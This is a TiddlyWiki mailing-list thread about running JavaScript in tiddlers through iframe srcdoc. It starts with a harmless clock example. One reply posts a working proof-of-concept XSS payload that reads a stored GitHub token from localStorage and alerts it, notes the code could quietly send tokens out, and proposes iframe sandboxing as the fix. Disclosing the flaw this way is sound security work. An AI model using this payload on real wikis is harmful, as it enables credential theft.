cj.v..,
I don't have much experience with JS macros in TW, but I can imagine it
would be the same, especially if there is no sanitisation whatsoever. As to
eliminating iframes, normally there is no way to break-out of it. However,
in the case of my Proof-of-Concept with TW, the localStorage is global, and
can be accessed by ANY SITE. This is just one more reason I believe TW
should use browser cookies: they are not accessible from inside iframe, and
have more options for security and access.
On Monday, August 16, 2021 at 11:51:35 AM UTC-4 cj.v...@gmail.com wrote:
> It kind of sounds like the iFrame element should then be outright
> eliminated from the web entirely.
>
> That might be problematic.
>
> Re security, couldn't any tiddler that is a javascript macro be altered
> for nefarious purposes just as easily as injecting malicious javascript
> into an iFrame?
>
> On Monday, August 16, 2021 at 12:39:41 PM UTC-3 flanc...@gmail.com wrote:
>
>> This seems EXTREMELY INSECURE. What is to stop an attacker from injecting
>> malicious JS into a tiddler, regardless of whether it is "sandboxed".
>> Paste this Proof-of-Concept into a blank tiddler. What it does it steals
>> your GitHub PAT if you have it configured, and alerts it to you. While I
>> have not done it here, I could easily make it both invisible and have it
>> email me the PAT's it gathers.
>>
>> CODE:
>> <$vars vSrcDoc={{{ [[<body> <div
>> id="clockDiv"></div><script>document.getElementById('clockDiv').innerHTML =
>> `<a id="xss" href="javascript:alert('Your GitHub Token
>> is:'+localStorage.getItem('tw5-password-github')+'. If it is blank, you
>> probably don\\'t have TW GitHub saving configured');"></a>`;
>> document.getElementById('xss').click();</script></body>]] }}}>
>> <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
>> </$vars>
>>
>> Long-story-short, an attacker can easily bypass any sanitation TW
>> employs, and harvest credentials from various sites. It is my belief that
>> this issue needs to be fixed immediately, and brought to the attention of
>> Jeremy and other devs.
>>
>> I would be happy to help on the repair process. I have some experience
>> with PenTesting and fixing XSS vulnerabilities (mainly in my own
>> applications). I would recommend adding a listener to TW changes, and
>> checking for an iframe code. If it does contain this, TW should add a
>> sandbox constraint on it (
>> https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox
>> )
>>
>> On Monday, August 16, 2021 at 10:55:46 AM UTC-4 cj.v...@gmail.com wrote:
>>
>>> Updated one of the tiddlers in the JSON package. New version attached.
>>>
>>> The addition highlighted below:
>>>
>>> <body>
>>> <div id="clockDiv"></div>
>>> <script>
>>> *document.oncontextmenu = function() { *
>>> * return false; *
>>> *};*
>>> let clockEl = document.getElementById("clockDiv");
>>> ...
>>>
>>> The reason for the added code: block access to the back button in the
>>> iFrame (by blocking access to the entire menu), which winds up performing
>>> the back button operation on the entire browser page.
>>> On Sunday, August 15, 2021 at 11:27:41 PM UTC-3 Charlie Veniot wrote:
>>>
>>>> I don't know what made me think of this.
>>>>
>>>> In case this has not been brought up in a while (I doubt this is new to
>>>> seasoned folk) ...
>>>>
>>>> I was thinking: could I use an iFrame to include simple javascript in a
>>>> tiddler without getting into macros or plugins that enable javascript.
>>>>
>>>> And, if I could, then could I set things up so that the iFrame is
>>>> showing javascript dynamically created by the tiddler ?
>>>>
>>>> So here is a way to show a digital clock in TiddlyWiki, for
>>>> non-programmers who just want to copy and paste javascript code from the
>>>> web without figuring out how the javascript code works :
>>>>
>>>> Put this in a brand new tiddler:
>>>>
>>>> *<$vars* *vSrcDoc*={{{ [[<body> <div id="clockDiv"></div> <script>
>>>> let clockEl = document.getElementById("clockDiv"); function
>>>> getClockTime() { let date = new Date(); let hr =
>>>> date.getHours(); let min = date.getMinutes(); let sec =
>>>> date.getSeconds(); hr = ("0" + hr).slice(-2); min = ("0" +
>>>> min).slice(-2); sec = ("0" + sec).slice(-2); clockEl.innerHTML =
>>>> `${hr}:${min}:${sec}`; } setInterval(getClockTime, 1000);
>>>> </script></body>]] }}}*>*
>>>> *<iframe* srcdoc=*<<vSrcDoc>>* style="border:none;width:100%;"
>>>> *></iframe>*
>>>> *</$vars>*
>>>>
>>>> Sneaky sneaky, has me wondering what kind of other fun things could be
>>>> done...
>>>>
>>>
--
You received this message because you are subscribed to the Google Groups
"TiddlyWiki" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to tiddlywiki+unsubscr...@googlegroups.com.
To view this discussion on the web visit
https://groups.google.com/d/msgid/tiddlywiki/1a6658ea-0df4-453b-a739-e0025fb9a71fn%40googlegroups.com.
